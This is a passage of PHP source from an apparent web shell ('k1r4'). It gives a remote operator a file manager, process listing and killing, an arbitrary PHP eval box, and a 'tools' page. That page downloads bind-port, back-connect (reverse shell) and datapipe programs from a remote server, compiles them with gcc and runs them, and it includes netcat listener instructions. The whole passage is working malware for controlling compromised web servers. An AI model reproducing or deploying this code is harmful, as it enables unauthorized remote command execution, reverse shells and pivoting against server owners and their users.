1999 foreach ($regxp_highlight as $r)
2000 {
2001 if (ereg($r[0],$o))
2002 {
2003 if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; k1r4exit();}
2004 else
2005 {
2006 $r[1] = round($r[1]);
2007 $isdir = is_dir($v);
2008 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
2009 {
2010 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
2011 $disppath = $r[2].$disppath.$r[3];
2012 if ($r[4]) {break;}
2013 }
2014 }
2015 }
2016 }
2017 $uo = urlencode($o);
2018 $ud = urlencode($dir);
2019 $uv = urlencode($v);
2020 $row = array();
2021 if ($o == ".")
2022 {
2023 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
2024 $row[] = "LINK";
2025 }
2026 elseif ($o == "..")
2027 {
2028 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
2029 $row[] = "LINK";
2030 }
2031 elseif (is_dir($v))
2032 {
2033 if (is_link($v))
2034 {
2035 $disppath .= " => ".readlink($v);
2036 $type = "LINK";
2037 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
2038 }
2039 else
2040 {
2041 $type = "DIR";
2042 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
2043 }
2044 $row[] = $type;
2045 }
2046 elseif(is_file($v))
2047 {
2048 $ext = explode(".",$o);
2049 $c = count($ext)-1;
2050 $ext = $ext[$c];
2051 $ext = strtolower($ext);
2052 $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
2053 $row[] = view_size($a[1]);
2054 }
2055 $row[] = date("d.m.Y H:i:s",$a[2]);
2056 if (!$win) {$row[] = $a[3];}
2057 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
2058 if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
2059 else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
2060 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
2061 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
2062 if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
2063 elseif (is_link($v)) {$tab["links"][] = $row;}
2064 elseif (is_dir($v)) {$tab["folders"][] = $row;}
2065 elseif (is_file($v)) {$tab["files"][] = $row;}
2066 $i++;
2067 }
2068 }
2069 // Compiling table
2070 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
2071 echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
2072 foreach($table as $row)
2073 {
2074 echo "<tr>\r\n";
2075 foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
2076 echo "</tr>\r\n";
2077 }
2078 echo "</table><hr size=\"1\" noshade><p align=\"right\">
2079 <script>
2080 function ls_setcheckboxall(status)
2081 {
2082 var id = 1;
2083 var num = ".(count($table)-2).";
2084 while (id <= num)
2085 {
2086 document.getElementById('actbox'+id).checked = status;
2087 id++;
2088 }
2089 }
2090 function ls_reverse_all()
2091 {
2092 var id = 1;
2093 var num = ".(count($table)-2).";
2094 while (id <= num)
2095 {
2096 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
2097 id++;
2098 }
2099 }
2100 </script>
2101 <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
2102 <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
2103 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
2104 {
2105 echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
2106 }
2107 echo "<select name=act><option value=\"".$act."\">With selected:</option>";
2108 echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
2109 echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
2110 if ($usefsbuff)
2111 {
2112 echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
2113 echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
2114 echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
2115 }
2116 echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
2117 echo "</form>";
2118 }
2119}
2120if ($act == "tools")
2121{
2122 $bndportsrcs = array(
2123 "k1r4_bindport.pl"=>array("Using PERL","perl %path %port"),
2124 "k1r4_bindport.c"=>array("Using C","%path %port %pass")
2125 );
2126 $bcsrcs = array(
2127 "k1r4_backconn.pl"=>array("Using PERL","perl %path %host %port"),
2128 "k1r4_backconn.c"=>array("Using C","%path %host %port")
2129 );
2130 $dpsrcs = array(
2131 "k1r4_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
2132 "k1r4_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
2133 );
2134 if (!is_array($bind)) {$bind = array();}
2135 if (!is_array($bc)) {$bc = array();}
2136 if (!is_array($datapipe)) {$datapipe = array();}
2137
2138 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
2139 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
2140
2141 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
2142 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
2143
2144 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
2145 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
2146 if (!empty($bindsubmit))
2147 {
2148 echo "<b>Result of binding port:</b><br>";
2149 $v = $bndportsrcs[$bind["src"]];
2150 if (empty($v)) {echo "Unknown file!<br>";}
2151 elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
2152 else
2153 {
2154 $w = explode(".",$bind["src"]);
2155 $ext = $w[count($w)-1];
2156 unset($w[count($w)-1]);
2157 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2158 $binpath = $tmpdir.join(".",$w).rand(0,999);
2159 if ($ext == "pl") {$binpath = $srcpath;}
2160 @unlink($srcpath);
2161 $fp = fopen($srcpath,"ab+");
2162 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2163 elseif (!$data = k1r4getsource($bind["src"])) {echo "Can't download sources!";}
2164 else
2165 {
2166 fwrite($fp,$data,strlen($data));
2167 fclose($fp);
2168 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2169 $v[1] = str_replace("%path",$binpath,$v[1]);
2170 $v[1] = str_replace("%port",$bind["port"],$v[1]);
2171 $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
2172 $v[1] = str_replace("//","/",$v[1]);
2173 $retbind = myshellexec($v[1]." > /dev/null &");
2174 sleep(5);
2175 $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
2176 if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
2177 else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
2178 }
2179 echo "<br>";
2180 }
2181 }
2182 if (!empty($bcsubmit))
2183 {
2184 echo "<b>Result of back connection:</b><br>";
2185 $v = $bcsrcs[$bc["src"]];
2186 if (empty($v)) {echo "Unknown file!<br>";}
2187 else
2188 {
2189 $w = explode(".",$bc["src"]);
2190 $ext = $w[count($w)-1];
2191 unset($w[count($w)-1]);
2192 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2193 $binpath = $tmpdir.join(".",$w).rand(0,999);
2194 if ($ext == "pl") {$binpath = $srcpath;}
2195 @unlink($srcpath);
2196 $fp = fopen($srcpath,"ab+");
2197 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2198 elseif (!$data = k1r4getsource($bc["src"])) {echo "Can't download sources!";}
2199 else
2200 {
2201 fwrite($fp,$data,strlen($data));
2202 fclose($fp);
2203 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2204 $v[1] = str_replace("%path",$binpath,$v[1]);
2205 $v[1] = str_replace("%host",$bc["host"],$v[1]);
2206 $v[1] = str_replace("%port",$bc["port"],$v[1]);
2207 $v[1] = str_replace("//","/",$v[1]);
2208 $retbind = myshellexec($v[1]." > /dev/null &");
2209 echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
2210 }
2211 }
2212 }
2213 if (!empty($dpsubmit))
2214 {
2215 echo "<b>Result of datapipe-running:</b><br>";
2216 $v = $dpsrcs[$datapipe["src"]];
2217 if (empty($v)) {echo "Unknown file!<br>";}
2218 elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
2219 else
2220 {
2221 $srcpath = $tmpdir.$datapipe["src"];
2222 $w = explode(".",$datapipe["src"]);
2223 $ext = $w[count($w)-1];
2224 unset($w[count($w)-1]);
2225 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2226 $binpath = $tmpdir.join(".",$w).rand(0,999);
2227 if ($ext == "pl") {$binpath = $srcpath;}
2228 @unlink($srcpath);
2229 $fp = fopen($srcpath,"ab+");
2230 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2231 elseif (!$data = k1r4getsource($datapipe["src"])) {echo "Can't download sources!";}
2232 else
2233 {
2234 fwrite($fp,$data,strlen($data));
2235 fclose($fp);
2236 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2237 list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
2238 $v[1] = str_replace("%path",$binpath,$v[1]);
2239 $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
2240 $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
2241 $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
2242 $v[1] = str_replace("//","/",$v[1]);
2243 $retbind = myshellexec($v[1]." > /dev/null &");
2244 sleep(5);
2245 $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
2246 if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
2247 else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
2248 }
2249 echo "<br>";
2250 }
2251 }
2252 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
2253 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2254 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
2255<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
2256foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2257?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
2258Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
2259<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
2260foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2261?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
2262}
2263if ($act == "processes")
2264{
2265 echo "<b>Processes:</b><br>";
2266 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
2267 else {$handler = "tasklist";}
2268 $ret = myshellexec($handler);
2269 if (!$ret) {echo "Can't execute \"".$handler."\"!";}
2270 else
2271 {
2272 if (empty($processes_sort)) {$processes_sort = $sort_default;}
2273 $parsesort = parsesort($processes_sort);
2274 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2275 $k = $parsesort[0];
2276 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2277 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2278 $ret = htmlspecialchars($ret);
2279 if (!$win)
2280 {
2281 if ($pid)
2282 {
2283 if (is_null($sig)) {$sig = 9;}
2284 echo "Sending signal ".$sig." to #".$pid."... ";
2285 if (posix_kill($pid,$sig)) {echo "OK.";}
2286 else {echo "ERROR.";}
2287 }
2288 while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
2289 $stack = explode("\n",$ret);
2290 $head = explode(" ",$stack[0]);
2291 unset($stack[0]);
2292 for($i=0;$i<count($head);$i++)
2293 {
2294 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
2295 }
2296 $prcs = array();
2297 foreach ($stack as $line)
2298 {
2299 if (!empty($line))
2300{
2301 echo "<tr>";
2302 $line = explode(" ",$line);
2303 $line[10] = join(" ",array_slice($line,10));
2304 $line = array_slice($line,0,11);
2305 if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
2306 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2307 $prcs[] = $line;
2308 echo "</tr>";
2309 }
2310 }
2311 }
2312 else
2313 {
2314 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2315 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2316 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2317 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2318 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2319 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2320 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2321 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2322 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2323 while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
2324 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2325 $ret = convert_cyr_string($ret,"d","w");
2326 $stack = explode("\n",$ret);
2327 unset($stack[0],$stack[2]);
2328 $stack = array_values($stack);
2329 $head = explode("",$stack[0]);
2330 $head[1] = explode(" ",$head[1]);
2331 $head[1] = $head[1][0];
2332 $stack = array_slice($stack,1);
2333 unset($head[2]);
2334 $head = array_values($head);
2335 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2336 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2337 if ($k > count($head)) {$k = count($head)-1;}
2338 for($i=0;$i<count($head);$i++)
2339 {
2340 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
2341 }
2342 $prcs = array();
2343 foreach ($stack as $line)
2344 {
2345 if (!empty($line))
2346 {
2347 echo "<tr>";
2348 $line = explode("",$line);
2349 $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
2350 $line[2] = intval(str_replace(" ","",$line[2]))*1024;
2351 $prcs[] = $line;
2352 echo "</tr>";
2353 }
2354 }
2355 }
2356 $head[$k] = "<b>".$head[$k]."</b>".$y;
2357 $v = $processes_sort[0];
2358 usort($prcs,"tabsort");
2359 if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
2360 $tab = array();
2361 $tab[] = $head;
2362 $tab = array_merge($tab,$prcs);
2363 echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
2364 foreach($tab as $i=>$k)
2365 {
2366 echo "<tr>";
2367 foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
2368 echo "</tr>";
2369 }
2370 echo "</table>";
2371 }
2372}
2373if ($act == "eval")
2374{
2375 if (!empty($eval))
2376 {
2377 echo "<b>Result of execution this PHP-code</b>:<br>";
2378 $tmp = ob_get_contents();
2379 $olddir = realpath(".");
2380 @chdir($d);
2381 if ($tmp)
2382 {
2383 ob_clean();
2384 eval($eval);
2385 $ret = ob_get_contents();
2386 $ret = convert_cyr_string($ret,"d","w");
2387 ob_clean();
2388 echo $tmp;
2389 if ($eval_txt)
2390 {
2391 $rows = count(explode("\r\n",$ret))+1;
2392 if ($rows < 10) {$rows = 10;}
2393 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2394 }
2395 else {echo $ret."<br>";}
2396 }
2397 else
2398 {
2399 if ($eval_txt)
2400 {
2401 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
2402 eval($eval);
2403 echo "</textarea>";
2404 }
2405 else {echo $ret;}
2406 }
2407 @chdir($olddir);
2408 }
2409 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
2410 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
2411}
2412if ($act == "f")
2413{
2414 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
2415 {
2416 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
2417 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
2418 }
2419 else
2420 {
2421 $r = @file_get_contents($d.$f);
2422 $ext = explode(".",$f);
2423 $c = count($ext)-1;
2424 $ext = $ext[$c];
2425 $ext = strtolower($ext);
2426 $rft = "";
2427 foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
2428 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
2429 if (empty($ft)) {$ft = $rft;}
2430 $arr = array(
2431 array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
2432 array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
2433 array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
2434 array("Code","code"),
2435 array("Session","phpsess"),
2436 array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
2437 array("SDB","sdb"),
2438 array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
2439 array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
2440 array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
2441 array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
2442 array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
2443 );
2444 echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
2445 foreach($arr as $t)
2446 {
2447 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
2448 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
2449 else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
2450 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
2451 }
2452 echo "<hr size=\"1\" noshade>";
2453 if ($ft == "info")
2454 {
2455 echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
2456 if (!$win)
2457 {
2458 echo "<tr><td><b>Owner/Group</b></td><td> ";
2459 $ow = posix_getpwuid(fileowner($d.$f));
2460 $gr = posix_getgrgid(filegroup($d.$f));
2461 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2462 }
2463 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
2464 $fi = fopen($d.$f,"rb");
2465 if ($fi)
2466 {
2467 if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
2468 else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
2469 $n = 0;
2470 $a0 = "00000000<br>";
2471 $a1 = "";
2472 $a2 = "";
2473 for ($i=0; $i<strlen($str); $i++)
2474 {
2475 $a1 .= sprintf("%02X",ord($str[$i]))." ";
2476 switch (ord($str[$i]))
2477 {
2478 case 0: $a2 .= "<font>0</font>"; break;
2479 case 32:
2480 case 10:
2481 case 13: $a2 .= "&nbsp;"; break;
2482 default: $a2 .= htmlspecialchars($str[$i]);
2483 }
2484 $n++;
2485 if ($n == $hexdump_rows)
2486 {
2487 $n = 0;
2488 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2489 $a1 .= "<br>";
2490 $a2 .= "<br>";
2491 }
2492 }
2493 //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
2494 echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
2495 }
2496 $encoded = "";
2497 if ($base64 == 1)
2498 {
2499 echo "<b>Base64 Encode</b><br>";
2500 $encoded = base64_encode(file_get_contents($d.$f));
2501 }
2502 elseif($base64 == 2)
2503 {
2504 echo "<b>Base64 Encode + Chunk</b><br>";
2505 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2506 }
2507 elseif($base64 == 3)
2508 {
2509 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
2510 $encoded = base64_encode(file_get_contents($d.$f));
2511 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2512 }
2513 elseif($base64 == 4)
2514 {
2515 $text = file_get_contents($d.$f);
2516 $encoded = base64_decode($text);
2517 echo "<b>Base64 Decode";
2518 if (base64_encode($encoded) != $text) {echo " (failed)";}
2519 echo "</b><br>";
2520 }
2521 if (!empty($encoded))
2522 {
2523 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
2524 }
2525 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
2526<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
2527<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
2528<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
2529<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
2530<P>";
2531 }
2532 elseif ($ft == "html")
2533 {
2534 if ($white) {@ob_clean();}
2535 echo $r;
2536 if ($white) {k1r4exit();}
2537 }
2538 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
2539 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
2540 elseif ($ft == "phpsess")
2541 {
